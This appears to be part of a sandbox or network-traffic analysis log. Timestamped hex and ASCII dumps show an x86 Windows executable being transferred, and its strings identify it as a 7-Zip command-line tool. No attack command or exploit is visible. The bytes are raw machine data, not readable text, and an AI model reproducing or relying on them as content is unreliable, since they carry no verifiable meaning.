                                                                                                                  Data Ascii: E,YMSQXHX,nuDGPuE8X<tE}ZM0EPhGVu0YM(_M(EPEuY)8^$E;t}HPPTUxf;v`EE;tPQEE;tPQ;EtWPMEuYE
                                                                                                                  2023-08-03 15:59:55 UTC208INData Raw: e8 15 e4 fc ff 8d 4e 18 e8 4b 6c 00 00 e8 42 0c 00 00 68 78 a8 48 00 8b f0 ff 15 7c 90 47 00 8b c6 5f 5e 5b 5d c2 14 00 80 65 0b 00 eb 89 8b 81 bc 00 00 00 85 c0 74 12 39 81 c8 00 00 00 75 0a 6a 00 83 c1 18 e8 d4 6a 00 00 c3 53 bb 78 a8 48 00 56 53 ff 15 78 90 47 00 e8 f6 0b 00 00 85 c0 74 04 8b f0 eb 6d 8b 74 24 0c 57 8b ce 83 86 58 01 00 00 01 8d 86 58 01 00 00 83 50 04 00 83 86 50 01 00 00 01 8d 86 50 01 00 00 83 50 04 00 e8 ab fc ff ff 8b be cc 00 00 00 85 ff 74 2d ff 37 ff 35 e0 c1 47 00 ff 15 d4 91 47 00 59 59 ff 74 24 14 8b cf e8 49 d4 fc ff 8b c8 e8 2f d4 fc ff 8b 8e cc 00 00 00 e8 15 d4 fc ff e8 84 0b 00 00 8b f0 5f 53 ff 15 7c 90 47 00 8b c6 5e 5b c2 08 00 53 56 57 8b 7c 24 10 8b d9 33 f6 8b 07 83 67 04 00 80 20 00 8d 43 ff 83 f8 08 77 65 ff 24
                                                                                                                  Data Ascii: NKlBhxH|G_^[]et9ujjSxHVSxGtmt$WXXPPPPt-75GGYYt$I/_S|G^[SVW|$3g Cwe$
                                                                                                                  2023-08-03 15:59:55 UTC224INData Raw: 4d c8 50 89 45 ec e8 6c a6 fc ff 8b 45 ec 83 78 10 00 74 26 68 fc c4 47 00 8d 4d c8 e8 92 a6 fc ff 8b 45 ec 8d 4d c8 83 c0 0c 50 e8 47 a6 fc ff 8d 4d c8 6a 29 e8 55 85 fc ff ff 45 e4 8b 45 e4 3b 43 20 72 a3 6a 0d 8d 55 c8 8b ce e8 66 19 00 00 ff 36 6a 20 ff d7 83 7b 30 00 59 59 74 21 ff 36 68 9c e0 47 00 ff 15 d4 91 47 00 59 59 ff 73 30 8b ce e8 af 96 fc ff ff 30 6a 20 ff d7 59 59 83 65 ec 00 83 7b 38 00 0f 86 a6 00 00 00 83 7d ec 00 74 0f ff 36 68 94 e0 47 00 ff 15 d4 91 47 00 59 59 8b 43 34 8b 4d ec 83 65 e4 00 8b 04 88 89 45 dc 83 78 04 00 76 6c 83 7d e4 00 74 0b ff 36 6a 20 ff d7 8b 45 dc 59 59 8b 00 8b 4d e4 8a 04 08 3c 20 76 04 3c 80 72 33 0f b6 c0 89 45 a8 c1 e8 04 83 f8 0a 73 05 83 c0 30 eb 03 83 c0 37 ff 36 0f b6 c0 50 ff d7 8b 45 a8 59 83 e0 0f
                                                                                                                  Data Ascii: MPElExt&hGMEMPGMj)UEE;C rjUf6j {0YYt!6hGGYYs00j YYe{8}t6hGGYYC4MeExvl}t6j EYYM< v<r3Es076PEY
                                                                                                                  2023-08-03 15:59:55 UTC240INData Raw: 15 18 92 47 00 89 07 f7 d8 1b c0 25 f2 ff f8 7f 05 0e 00 07 80 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c2 04 00 b8 26 cb 43 00 c3 b8 0e 00 07 80 eb e2 80 b9 c0 00 00 00 00 75 32 83 b9 c8 00 00 00 07 76 29 8b 44 24 04 85 c0 74 06 66 83 38 00 75 05 a1 54 e4 47 00 6a 01 68 fc e5 47 00 ff 74 24 10 83 c1 08 50 e8 ff fa ff ff eb 02 33 c0 c2 08 00 b8 a4 69 47 00 e8 c9 25 03 00 83 ec 0c 56 8b f1 57 8b 3d d4 91 47 00 85 f6 74 0c ff 36 ff 35 04 e6 47 00 ff d7 59 59 85 f6 74 13 ff 36 ff 35 08 e6 47 00 ff d7 59 59 8b ce e8 2f 54 fc ff 8d 4d e8 e8 26 5b fc ff 83 65 fc 00 8d 45 e8 50 b9 98 a5 48 00 e8 e7 52 fc ff 84 c0 74 77 a1 98 a5 48 00 8b 40 0c c1 e8 05 a8 01 75 68 8d 4d e8 e8 2c 5e fc ff 8d 4d e8 e8 e7 5d fc ff 83 7d ec 00 75 0f a1 98 a5 48 00 8b 40 0c c1 e8 04
                                                                                                                  Data Ascii: G%M_^d[&Cu2v)D$tf8uTGjhGt$P3iG%VW=Gt65GYYt65GYY/TM&[eEPHRtwH@uhM,^M]}uH@
                                                                                                                  2023-08-03 15:59:55 UTC256INData Raw: f4 5c fe ff 6a 50 e8 50 13 fc ff 85 c0 59 74 0a 6a 01 8b c8 e8 d8 fe ff ff c3 33 c0 c3 e9 00 00 00 00 b9 58 e7 47 00 e9 cc 5c fe ff 83 6c 24 04 04 e9 e6 fe ff ff 83 6c 24 04 04 e9 50 ff ff ff 8b 44 24 08 c7 00 02 00 00 00 33 c0 c2 08 00 8b 44 24 08 83 f8 02 72 07 b8 57 00 07 80 eb 25 0f b6 80 18 e8 47 00 8b 4c 24 10 89 01 8b 4c 24 14 66 0f b6 80 b0 9b 47 00 66 89 01 8b 44 24 0c 83 20 00 33 c0 c2 14 00 8b 44 24 08 83 f8 02 72 07 b8 57 00 07 80 eb 25 0f b6 80 1c e8 47 00 8b 4c 24 10 89 01 8b 4c 24 14 66 0f b6 80 b0 9b 47 00 66 89 01 8b 44 24 0c 83 20 00 33 c0 c2 14 00 55 8b ec 83 ec 10 8b 45 0c 33 c9 48 66 89 4d f0 66 89 4d f2 89 4d f8 74 3c 83 e8 26 74 2f 83 e8 05 74 18 83 e8 23 75 36 8b 45 08 ff 70 34 ff 70 30 8d 4d f0 e8 c7 86 fc ff eb 23 8b 45 08 39 48
                                                                                                                  Data Ascii: \jPPYtj3XG\l$l$PD$3D$rW%GL$L$fGfD$ 3D$rW%GL$L$fGfD$ 3UE3HfMfMMt<&t/t#u6Ep4p0M#E9H
                                                                                                                  2023-08-03 15:59:55 UTC272INData Raw: fc 00 e8 88 d3 fb ff 59 8d 8d 38 ff ff ff e8 7b 89 ff ff 83 4d fc ff 8d 4d a4 e8 b6 04 00 00 8b c7 eb 60 ff 75 28 8b 45 ec 8b 48 50 56 e8 19 99 ff ff 56 8b f8 e8 55 d3 fb ff 59 8b 45 14 c6 45 fc 18 85 c0 74 06 8b 08 50 ff 51 08 8b f7 8d 4d 88 c6 45 fc 02 e8 42 a4 ff ff ff b5 78 ff ff ff 80 65 fc 00 e8 26 d3 fb ff 59 8d 8d 38 ff ff ff e8 19 89 ff ff 83 4d fc ff 8d 4d a4 e8 54 04 00 00 8b c6 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c2 48 00 56 8b f1 8b 46 04 85 c0 74 0d 50 6a 00 ff 36 e8 04 a9 02 00 83 c4 0c ff 36 e8 dd d2 fb ff 59 5e c3 56 8b f1 8b 06 85 c0 74 21 50 ff 15 20 92 47 00 d1 e0 50 6a 00 ff 36 e8 db a8 02 00 83 c4 0c ff 36 ff 15 1c 92 47 00 83 26 00 5e c3 56 8b f1 e8 cc ff ff ff ff 36 ff 15 1c 92 47 00 5e c3 56 8b f1 8b 06 85 c0 74 17 8b 4e 08
                                                                                                                  Data Ascii: Y8{MM`u(EHPVVUYEEtPQMEBxe&Y8MMTM_^[dHVFtPj66Y^Vt!P GPj66G&^V6G^VtN
                                                                                                                  2023-08-03 15:59:55 UTC288INData Raw: 81 f9 1b 01 03 03 75 0c c7 45 f0 bc eb 47 00 e9 dc fe ff ff 81 f9 03 01 03 03 75 0c c7 45 f0 2c ab 47 00 e9 c8 fe ff ff 81 f9 01 07 f1 06 75 79 83 f8 01 c7 45 f0 b4 eb 47 00 0f 82 b0 fe ff ff 8a 06 8d 55 a0 83 e0 3f 8b c8 e8 ad 8d fb ff e9 9c fe ff ff 85 db 74 29 8b 45 ec 03 f0 8d 84 35 a0 fe ff ff c6 00 3a 8a 4d a0 40 88 08 40 80 7d a0 00 8d 4d a1 74 0a 8a 11 88 10 40 41 84 d2 75 f6 80 7d 0b 00 74 0d 8b 45 ec 03 f8 c6 84 3d 9f fe ff ff 20 8b 5d ec ff 4d d0 c6 45 0b 01 0f 85 06 fd ff ff e9 bf 00 00 00 8d 4d c0 e8 2e 9b fb ff ff 75 e4 83 65 fc 00 8d 4d c0 ff 75 e0 e8 34 1a fc ff 80 7d 0b 00 74 09 4b c6 84 1d a0 fe ff ff 20 8b 75 c4 85 f6 75 19 ff 75 e4 8d 8c 1d a0 fe ff ff ff 75 e0 e8 41 f7 ff ff 2b d8 89 5d ec eb 27 8d 46 05 3b c3 77 32 2b de 33 c0 85 f6
                                                                                                                  Data Ascii: uEGuE,GuyEGU?t)E5:M@@}Mt@Au}tE= ]MEM.ueMu4}tK uuuuA+]'F;w2+3
                                                                                                                  2023-08-03 15:59:55 UTC304INData Raw: 00 00 40 0f 87 0e 02 00 00 8b 45 c4 83 c0 f2 83 f8 0b 0f 87 ff 01 00 00 ff 24 85 0e cf 44 00 80 65 88 00 80 65 89 00 8d 45 dc 8d 4d 84 50 56 c6 45 fc 08 e8 2c e3 ff ff 8b 46 38 8d 8f e8 00 00 00 8b 50 04 2b 50 08 52 89 55 e8 e8 1e 77 fb ff ff 75 e8 8b 87 e8 00 00 00 8b 4e 38 50 e8 c1 e3 ff ff 8b 45 08 8d 8f f0 00 00 00 40 50 e8 a5 09 00 00 33 c0 39 45 08 89 45 18 89 45 0c 76 5d 8b 45 e8 8b 55 18 8b 8f e8 00 00 00 2b c2 d1 e8 8d 0c 11 c7 45 14 00 00 00 00 74 10 66 83 39 00 74 0a ff 45 14 41 41 39 45 14 72 f0 39 45 14 75 05 e8 02 e3 ff ff 8b 55 18 8b 87 f0 00 00 00 8b 4d 0c d1 ea 89 14 88 8b 45 18 8b 55 14 41 3b 4d 08 89 4d 0c 8d 44 50 02 89 45 18 72 a3 8b 4d 18 8b 87 f0 00 00 00 8b 55 0c d1 e9 89 0c 90 8b 45 e8 39 45 18 74 04 c6 46 3c 01 c6 45 fc 07 8d 4d
                                                                                                                  Data Ascii: @E$DeeEMPVE,F8P+PRUwuN8PE@P39EEEv]EU+Etf9tEAA9Er9EuUMEUA;MMDPErMUE9EtF<EM
                                                                                                                  2023-08-03 15:59:55 UTC320INData Raw: 34 08 8d 8d ac fc ff ff 6a 01 ff 75 c0 e8 23 de ff ff 53 57 8b ce e8 7e ab ff ff 8b 76 30 8b 45 c4 83 65 9c 00 83 7b 14 00 8b 34 30 76 53 c1 e6 03 8b 45 dc 8d 8d dc fc ff ff 8b 40 08 8b 7c 06 08 8b 5c 06 0c 2b 3c 06 1b 5c 06 04 e8 2c 60 ff ff 8b 85 e0 fc ff ff 8b 8d dc fc ff ff ff 85 e0 fc ff ff ff 45 9c 89 3c c1 8b 8d dc fc ff ff 83 c6 08 89 5c c1 04 8b 45 d4 8b 4d 9c 3b 48 14 72 b0 8b 45 dc 8b 4d c4 8b 40 2c 8b 34 01 8b 4d f0 8b 04 01 3b f0 89 45 c0 0f 83 9c 05 00 00 8b 45 dc 8d 8d d0 fc ff ff 8b 40 28 8b 3c f0 8b 5c f0 04 e8 c7 5f ff ff 8b 85 d4 fc ff ff 8b 8d d0 fc ff ff ff 85 d4 fc ff ff 46 3b 75 c0 89 3c c1 8b 8d d0 fc ff ff 89 5c c1 04 72 c3 e9 5a 05 00 00 33 d2 89 55 80 89 55 84 89 55 88 8b 45 ec c6 45 fc 17 3b c2 89 55 c0 74 18 8b 08 6a 04 56 6a
                                                                                                                  Data Ascii: 4ju#SW~v0Ee{40vSE@|\+<\,`E<\EM;HrEM@,4M;EE@(<\_F;u<\rZ3UUUEE;UtjVj
                                                                                                                  2023-08-03 15:59:55 UTC336INData Raw: ff ff 85 c0 74 06 8b 10 50 ff 52 08 b8 05 40 00 80 e9 97 00 00 00 8b 44 24 14 c7 84 24 04 03 00 00 ff ff ff ff 85 c0 74 06 8b 08 50 ff 51 08 8b c6 eb 7a 8b 44 24 14 c7 84 24 04 03 00 00 ff ff ff ff 85 c0 74 06 8b 08 50 ff 51 08 b8 05 40 00 80 eb 5a 85 d2 c7 84 24 04 03 00 00 ff ff ff ff 74 06 8b 02 52 ff 50 08 b8 05 40 00 80 eb 3e 85 d2 c7 84 24 04 03 00 00 ff ff ff ff 74 06 8b 0a 52 ff 51 08 b8 05 40 00 80 eb 22 8b 44 24 14 c7 84 24 04 03 00 00 ff ff ff ff 85 c0 74 06 8b 10 50 ff 52 08 8b c6 eb 05 b8 57 00 07 80 8b 8c 24 fc 02 00 00 5f 5e 5d 5b 64 89 0d 00 00 00 00 81 c4 f8 02 00 00 c2 1c 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 55 8b ec 6a ff 68 e0 7e 47 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 51 8b 45 24 8b 4d 20 8b 55 1c 53 56 57 89 65 f0 50
                                                                                                                  Data Ascii: tPR@D$$tPQzD$$tPQ@Z$tRP@>$tRQ@"D$$tPRW$_^][dUjh~GdPd%QE$M USVWeP
                                                                                                                  2023-08-03 15:59:55 UTC352INData Raw: 72 0f 01 00 8b 4f 04 8b 47 08 85 c9 c7 44 24 0c 00 00 00 00 74 24 83 f8 01 76 1f 8b 4f 10 33 d2 8b f1 3b ce 75 05 3b 57 14 74 03 83 c9 ff 89 4c 24 48 c7 44 24 0c 01 00 00 00 89 44 24 40 8b 44 24 68 50 8d 4c 24 50 e8 5b 1f fb ff 8b 4c 24 6c 51 8d 4c 24 20 e8 be 1f fb ff 8b 74 24 78 8d 4c 24 10 56 e8 e2 1e fb ff f7 de 1b f6 8d 54 24 10 23 f2 8d 44 24 0c 56 8b 74 24 74 50 53 8b 9c 24 80 00 00 00 8d 4c 24 58 8b c3 8d 54 24 28 51 8b 0f 25 ff 00 00 00 52 50 56 8d 54 24 50 e8 74 20 01 00 8b c8 8b 44 24 24 85 c0 89 4f 18 75 44 8b 44 24 18 85 c0 75 3c 8b 44 24 54 85 c0 74 05 83 f9 08 74 2f 85 c9 c6 47 1c 01 75 22 84 db 74 1e 85 f6 74 1a 8b 16 8b 44 24 2c 3b d0 75 0b 8b 46 04 8b 54 24 30 3b c2 74 05 b9 01 00 00 00 e8 13 00 00 00 5f 5e 5b 83 c4 58 c2 14 00 90 90 90
                                                                                                                  Data Ascii: rOGD$t$vO3;u;WtL$HD$D$@D$hPL$P[L$lQL$ t$xL$VT$#D$Vt$tPS$L$XT$(Q%RPVT$Pt D$$OuDD$u<D$Ttt/Gu"ttD$,;uFT$0;t_^[X
                                                                                                                  2023-08-03 15:59:55 UTC368INData Raw: 24 1c 04 00 00 8d 8c 24 20 04 00 00 2b ee 2b ce 57 8d 46 08 8b b4 24 28 08 00 00 89 54 24 18 33 ff eb 03 8d 49 00 8b 58 f8 8b d3 c1 e3 05 23 de 23 d6 89 5c 3c 20 8b 58 fc 89 94 3c 20 04 00 00 8b d3 c1 e3 05 23 de 23 d6 89 5c 3c 24 8b 18 89 94 3c 24 04 00 00 8b d3 23 d6 c1 e3 05 89 14 28 8b 54 24 1c 23 de 89 1c 02 8b 58 04 8b d3 23 d6 c1 e3 05 89 14 01 8b 54 24 18 23 de 89 1c 02 83 c7 10 83 c0 10 81 ff 00 04 00 00 72 99 8b 9c 24 30 08 00 00 85 db 74 48 8b 4c 24 10 8b bc 24 24 08 00 00 8b b4 24 2c 08 00 00 8b 54 24 14 41 8d a4 24 00 00 00 00 0f b6 41 02 0f b6 69 ff 8b 44 84 20 33 84 ac 20 04 00 00 0f b7 29 33 c5 8b ea 2b 2c 87 41 89 2e 89 14 87 83 c6 04 42 4b 75 d6 5f 5e 5d 5b 81 c4 10 08 00 00 c2 14 00 cc cc cc cc cc cc cc cc cc 81 ec 00 04 00 00 53 56 8b
                                                                                                                  Data Ascii: $$ ++WF$(T$3IX##\< X< ##\<$<$#(T$#X#T$#r$0tHL$$$$,T$A$AiD 3 )3+,A.BKu_^][SV
                                                                                                                  2023-08-03 15:59:55 UTC384INData Raw: df c1 eb 05 03 df 8b 7c 24 24 66 89 1e 8d 34 7e 0f b7 7e 02 8b c1 81 f9 00 00 00 01 73 16 c1 e1 08 8b c1 8b 4c 24 10 0f b6 19 c1 e2 08 0b d3 41 89 4c 24 10 8b c8 c1 e9 0b 0f af cf 3b d1 73 19 8b c1 b9 00 08 00 00 2b cf c1 e9 05 03 cf 66 89 4e 02 b9 02 00 00 00 eb 14 2b c1 2b d1 8b cf c1 e9 05 2b f9 66 89 7e 02 b9 03 00 00 00 8d 1c 09 0f b7 0c 33 3d 00 00 00 01 73 13 8b 7c 24 10 0f b6 3f c1 e2 08 c1 e0 08 0b d7 ff 44 24 10 8b f8 c1 ef 0b 0f af f9 3b d7 73 14 8b c7 bf 00 08 00 00 2b f9 c1 ef 05 03 f9 66 89 3c 33 eb 10 2b c7 2b d7 8b f9 c1 ef 05 2b cf 66 89 0c 33 43 8d 0c 1b 0f b7 3c 31 3d 00 00 00 01 73 13 8b 5c 24 10 0f b6 1b c1 e2 08 c1 e0 08 0b d3 ff 44 24 10 8b d8 c1 eb 0b 0f af df 3b d3 73 1a 8b c3 bb 00 08 00 00 2b df c1 eb 05 03 df 66 89 1c 31 83 e9
                                                                                                                  Data Ascii: |$$f4~~sL$AL$;s+fN+++f~3=s|$?D$;s+f<3+++f3C<1=s\$D$;s+f1
                                                                                                                  2023-08-03 15:59:55 UTC400INData Raw: 00 cc cc cc cc cc 83 ec 08 53 55 56 57 bf 02 00 00 00 8d 88 10 12 00 00 0f b7 a8 32 1e 00 00 8d 77 fe 8b de 83 e3 01 8b d3 83 c3 02 03 db 89 5c 24 10 0f b7 9c 03 30 1e 00 00 f7 da 81 e2 f0 07 00 00 33 d5 d1 ee c1 eb 04 8b ee 83 e5 01 89 6c 24 14 f7 dd c1 ed 04 83 e5 7f 33 dd c1 ea 04 8b 94 90 60 07 00 00 03 94 98 60 07 00 00 8b 5c 24 10 03 5c 24 14 d1 ee 03 db 89 5c 24 10 0f b7 9c 03 30 1e 00 00 83 e6 01 c1 eb 04 8b ee f7 dd c1 ed 04 83 e5 7f 33 dd 03 94 98 60 07 00 00 8b 5c 24 10 03 de 0f b7 b4 58 30 1e 00 00 8b de c1 eb 04 8b 9c 98 60 07 00 00 03 da 89 59 e0 81 f6 f0 07 00 00 c1 ee 04 8b b4 b0 60 07 00 00 03 f2 89 31 0f b7 a8 32 1e 00 00 8d 77 ff 8b de 83 e3 01 8b d3 f7 da 81 e2 f0 07 00 00 33 d5 83 c3 02 d1 ee 03 db 8b ee 83 e5 01 89 5c 24 10 0f b7 9c
                                                                                                                  Data Ascii: SUVW2w\$03l$3``\$\$\$03`\$X0`Y`12w3\$
                                                                                                                  2023-08-03 15:59:55 UTC416INData Raw: c1 e1 08 66 0b ca 66 39 4c 24 04 75 14 80 7e 0a 59 75 0e 80 7e 0b 5a 75 08 b8 01 00 00 00 c2 0c 00 33 c0 c2 0c 00 57 0f b6 7a 10 83 e7 03 8b c7 c1 e0 05 83 7c 10 18 21 8d 4c 10 18 75 6e 83 79 04 00 75 68 b8 01 00 00 00 39 41 08 75 5e 80 79 0c 28 77 58 53 33 db 56 85 ff 74 46 8d 4a 18 8d a4 24 00 00 00 00 8b 11 8b 71 04 83 fa 03 75 09 85 f6 75 10 39 41 08 eb 1e 85 f6 75 07 83 fa 03 72 24 85 f6 77 20 72 05 83 fa 0a 77 19 8b 51 08 85 d2 74 05 83 fa 04 75 0d 03 d8 83 c1 20 3b df 72 c4 5e 5b 5f c3 5e 5b 33 c0 5f c3 33 c0 5f c3 cc cc cc cc cc cc 83 ec 18 53 55 8b da 0f b6 2b 03 ed 57 8b f9 03 ed 8b d5 8b cb 89 7c 24 18 e8 72 55 00 00 3b 04 2b 74 0c 5f 5d b8 10 00 00 00 5b 83 c4 18 c3 8a 43 01 56 88 47 10 be 02 00 00 00 c7 07 ff ff ff ff c7 47 04 ff ff ff ff a8
                                                                                                                  Data Ascii: ff9L$u~Yu~Zu3Wz|!Lunyuh9Au^y(wXS3VtFJ$quu9Aur$w rwQtu ;r^[_^[3_3_SU+W|$rU;+t_][CVGG
                                                                                                                  2023-08-03 15:59:55 UTC432INData Raw: 72 b7 ff ff 85 c0 74 64 03 d8 8b 44 24 20 8b d5 56 2b d3 8d 0c 03 e8 5b b7 ff ff 85 c0 74 4d 8b 0f 03 d8 0b 4f 04 74 44 8b 44 24 24 83 44 24 28 10 40 89 44 24 24 3b 44 24 10 72 aa f6 c3 03 74 16 eb 03 8d 49 00 8b 54 24 20 8a 04 13 43 84 c0 75 1a f6 c3 03 75 ef 8b c3 2b c5 5f f7 d8 5b 1b c0 5e 83 e0 10 5d 83 c4 08 c2 10 00 5f 5b 5e b8 10 00 00 00 5d 83 c4 08 c2 10 00 5b 5e b8 10 00 00 00 5d 83 c4 08 c2 10 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 10 55 8b 6c 24 18 57 85 c9 75 0c 8b 7c 24 14 81 ff 00 00 00 80 76 0a 5f b8 04 00 00 00 5d c2 14 00 33 c0 3b ff 75 f0 3b c1 75 ec 8b 45 00 56 8b d7 8b cd ff d0 8b f0 85 f6 75 09 8d 46 02 5e 5f 5d c2 14 00 8b 4c 24 14 53 6a 04 57 8b d6 e8 ea e4 fe ff 8b d8 85 db 75 0f 8b 4c 24 14 55 57 56 51 e8 27 fe ff ff
                                                                                                                  Data Ascii: rtdD$ V+[tMOtDD$$D$(@D$$;D$rtIT$ Cuu+_[^]_[^][^]L$Ul$Wu|$v_]3;u;uEVuF^_]L$SjWuL$UWVQ'
                                                                                                                  2023-08-03 15:59:55 UTC448INData Raw: 2c 3b d0 74 12 8b ca 2b cf 8b f8 8a 01 3a 02 75 06 42 41 3b d7 75 f4 2b d6 89 53 f8 3b 54 24 14 75 22 8b 4d 14 8b 45 28 8b 54 24 10 89 14 88 8b 45 04 ff 45 14 40 ff 45 00 3b 45 08 89 45 04 e9 fa 00 00 00 8b 45 30 8b 4d 00 8b 7d 18 8b 75 14 89 44 24 2c 8b 45 28 89 44 24 18 8b 45 04 8b 6c 24 18 89 44 24 30 8b 44 24 14 03 c1 89 7c 24 38 89 44 24 34 8b 44 24 10 89 44 b5 00 8b 6c 24 1c 89 74 24 20 89 4c 24 28 85 c0 0f 84 9e 00 00 00 8b 74 24 30 2b f0 3b f7 0f 83 90 00 00 00 39 74 24 20 1b c0 23 c7 8b 7c 24 18 2b c6 03 44 24 20 8b 04 87 8b fe f7 df 89 44 24 10 8d 04 0f 89 44 24 24 8a 04 11 8b 4c 24 24 3a 04 11 8b 4c 24 28 75 39 8b 6c 24 24 8b c1 8a 09 3a 4d 00 8b 6c 24 1c 75 11 8d 49 00 40 3b 44 24 34 74 32 8a 08 3a 0c 38 74 f2 8b 4c 24 28 2b c1 3b d0 73 0d 89
                                                                                                                  Data Ascii: ,;t+:uBA;u+S;T$u"ME(T$EE@E;EEE0M}uD$,E(D$El$D$0D$|$8D$4D$Dl$t$ L$(t$0+;9t$ #|$+D$ D$D$$L$$:L$(u9l$$:Ml$uI@;D$4t2:8tL$(+;s
                                                                                                                  2023-08-03 15:59:55 UTC464INData Raw: d0 c2 fa ff 8d 4d b0 e9 fa c0 f9 ff 8d 8d 40 ff ff ff e9 b9 e6 fa ff 8d 4d 08 e9 88 4d fa ff 8d 4d 0c e9 6e a7 fc ff 8d 4d d0 e9 d7 c0 f9 ff 8d 8d 94 fe ff ff e9 cc c0 f9 ff ff 75 e4 e8 4d d3 f8 ff 59 c3 8d 4d b0 e9 ba c0 f9 ff b8 e0 34 48 00 e9 e2 a5 ff ff 8b 4d f0 83 c1 04 e9 41 15 fb ff 8b 4d f0 83 c1 48 e9 9a c0 f9 ff b8 50 35 48 00 e9 c2 a5 ff ff 8d 4d e4 e9 88 c0 f9 ff b8 80 35 48 00 e9 b0 a5 ff ff cc cc 8d 4d e8 e9 74 c0 f9 ff 8d 4d 14 e9 fb a6 fc ff 8d 4d c0 e9 76 47 f9 ff 8d 4d b4 e9 5c c0 f9 ff 8d 4d a8 e9 54 c0 f9 ff 8d 4d dc e9 4c c0 f9 ff 8d 8d 58 ff ff ff e9 14 f4 fa ff b8 a8 35 48 00 e9 69 a5 ff ff cc cc cc 8b 4d f0 e9 2c c0 f9 ff 8b 4d f0 83 c1 0c e9 21 c0 f9 ff 8b 4d f0 83 c1 18 e9 16 c0 f9 ff 8b 4d f0 83 c1 24 e9 0b c0 f9 ff b8 38 36 48
                                                                                                                  Data Ascii: M@MMMnMuMYM4HMAMHP5HM5HMtMMvGM\MTMLX5HiM,M!MM$86H
                                                                                                                  2023-08-03 15:59:55 UTC480INData Raw: 61 00 6c 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 6f 00 72 00 5c 00 30 00 00 00 00 00 4c 45 00 00 66 3a 00 00 20 3a 20 00 20 53 50 3a 00 00 00 00 57 69 6e 64 6f 77 73 00 20 2d 20 00 11 b7 40 00 52 3e 44 00 1b b7 40 00 0c b4 40 00 26 b5 40 00 fd b6 40 00 34 3e 44 00 07 b7 40 00 60 b3 40 00 e9 b6 40 00 16 3e 44 00 f3 b6 40 00 d6 b2 40 00 d5 b6 40 00 f8 3d 44 00 df b6 40 00 b6 b2 40 00 a1 ad 40 00 50 78 42 00 70 ae 40 00 ff ae 40 00 f1 b1 40 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 fe f2 46 00 37 00 7a 00 74 00 00 00 b8 c9 40 00 c2 c9 40 00 cc c9 40 00 a4 c7 40 00 9a c9 40 00 a4 c9 40 00 ae c9 40 00 04
                                                                                                                  Data Ascii: alProcessor\0LEf: : SP:Windows - @R>D@@&@@4>D@`@@>D@@@=D@@@PxBp@@@FFFFFFFFFFFFFFFFF7zt@@@@@@@
                                                                                                                  2023-08-03 15:59:55 UTC496INData Raw: 20 20 2d 61 6e 20 3a 20 64 69 73 61 62 6c 65 20 61 72 63 68 69 76 65 5f 6e 61 6d 65 20 66 69 65 6c 64 0a 20 20 2d 62 62 5b 30 2d 33 5d 20 3a 20 73 65 74 20 6f 75 74 70 75 74 20 6c 6f 67 20 6c 65 76 65 6c 0a 20 20 2d 62 64 20 3a 20 64 69 73 61 62 6c 65 20 70 72 6f 67 72 65 73 73 20 69 6e 64 69 63 61 74 6f 72 0a 20 20 2d 62 73 7b 6f 7c 65 7c 70 7d 7b 30 7c 31 7c 32 7d 20 3a 20 73 65 74 20 6f 75 74 70 75 74 20 73 74 72 65 61 6d 20 66 6f 72 20 6f 75 74 70 75 74 2f 65 72 72 6f 72 2f 70 72 6f 67 72 65 73 73 20 6c 69 6e 65 0a 20 20 2d 62 74 20 3a 20 73 68 6f 77 20 65 78 65 63 75 74 69 6f 6e 20 74 69 6d 65 20 73 74 61 74 69 73 74 69 63 73 0a 20 20 2d 69 5b 72 5b 2d 7c 30 5d 5d 7b 40 6c 69 73 74 66 69 6c 65 7c 21 77 69 6c 64 63 61 72 64 7d 20 3a 20 49 6e 63 6c 75
                                                                                                                  Data Ascii: -an : disable archive_name field -bb[0-3] : set output log level -bd : disable progress indicator -bs{o|e|p}{0|1|2} : set output stream for output/error/progress line -bt : show execution time statistics -i[r[-|0]]{@listfile|!wildcard} : Inclu
                                                                                                                  2023-08-03 15:59:55 UTC512INData Raw: ff ff 20 37 47 00 00 00 00 00 2a 37 47 00 20 05 93 19 02 00 00 00 28 17 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 3c 37 47 00 00 00 00 00 46 37 47 00 20 05 93 19 06 00 00 00 58 17 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 58 37 47 00 00 00 00 00 60 37 47 00 01 00 00 00 6b 37 47 00 02 00 00 00 76 37 47 00 03 00 00 00 81 37 47 00 04 00 00 00 8c 37 47 00 20 05 93 19 01 00 00 00 a8 17 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff a4 37 47 00 20 05 93 19 02 00 00 00 d0 17 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff b8 37 47 00 00 00 00 00 c0 37 47 00 20 05 93 19 02 00 00 00 00 18 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: 7G*7G (H<7GF7G XHX7G`7Gk7Gv7G7G7G H7G H7G7G H
                                                                                                                  2023-08-03 15:59:55 UTC528INData Raw: ff ff 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 01 00 00 00 18 57 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 4e 43 00 20 05 93 19 01 00 00 00 48 57 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 78 5f 47 00 20 05 93 19 01 00 00 00 70 57 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 8c 5f 47 00 20 05 93 19 01 00 00 00 98 57 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff a0 5f 47 00 20 05 93 19 02 00 00 00 c0 57 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff b4 5f 47 00 00 00 00 00 bc 5f 47 00 20 05 93 19 01 00 00 00 f0 57 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 